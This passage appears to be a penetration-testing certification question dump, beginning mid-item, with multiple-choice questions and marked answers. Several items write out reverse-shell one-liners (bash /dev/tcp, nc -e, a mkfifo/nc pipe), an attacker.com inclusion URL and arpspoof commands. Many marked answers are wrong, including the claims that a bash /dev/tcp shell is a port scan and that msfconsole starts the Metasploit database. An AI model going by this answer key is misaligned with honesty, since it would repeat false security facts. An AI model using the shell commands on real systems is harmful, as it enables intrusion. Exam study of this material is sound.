B. Execute a remote script.
100%
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
B. Preparing a pretext
100%
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
A. Dynamic analysis
B. Fuzzing analysis
C. Static analysis
D. Run-time analysis
C. Static analysis
100%
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.
A. Enable HTTP Strict Transport Security.
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.
B. Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.
D. Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.
C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.
100%
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
B. Principle of authority
100%
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
A. Discovery scan
100%
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
B. Block URL redirections.
100%
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
B. Dynamic scan
100%
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method.
B. HTTP OPTIONS method.
C. HTTP PUT method.
D. HTTP TRACE method.
A. HTTP POST method.
100%
A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4
B. nslookup -ns 8.8.8.8 << dnslist.txt
C. for x in {1..254}; do dig -x 192.168.$x.$x; done
D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf
C. for x in {1..254}; do dig -x 192.168.$x.$x; done
100%
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ”changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.
A. Perform an HTTP downgrade attack.
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
D. Lock bypass
The following line was found in an exploited machine’s history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0>&1
Which of the following describes what the command does?
A. Performs a port scan.
B. Grabs the web server’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.
A. Performs a port scan.
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
A. Goals/objectives
C. Tolerance to impact
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
B. Clickjacking attack
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e ‘use SOCKET’; $i=’; $p=’443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
D. bash -i >& /dev/tcp//443 0>&1
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. Appendices
B. Executive summary
C. Technical summary
D. Main body
B. Executive summary
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR.
B. Decompile.
C. Cross-compile the application.
D. Convert JAR files to DEX.
E. Re-sign the APK.
F. Attach to ADB.
A. Convert to JAR.
B. Decompile.
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
A. msfconsole
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security.
B. It is difficult for administrators to implement the same security standards across the board.
C. IoT systems often lack the hardware power required by more secure solutions.
D. Regulatory authorities often have lower security requirements for IoT systems.
A. Manufacturers developing IoT devices are less concerned with security.
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
A. Stack pointer register
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
D. An applicable XSD file
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
A. Targeting an executive with an SMS attack
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers
D. Health information communicated over HTTP
E. DAR encryption on records servers
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
A. Selection of the appropriate set of security testing tools
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254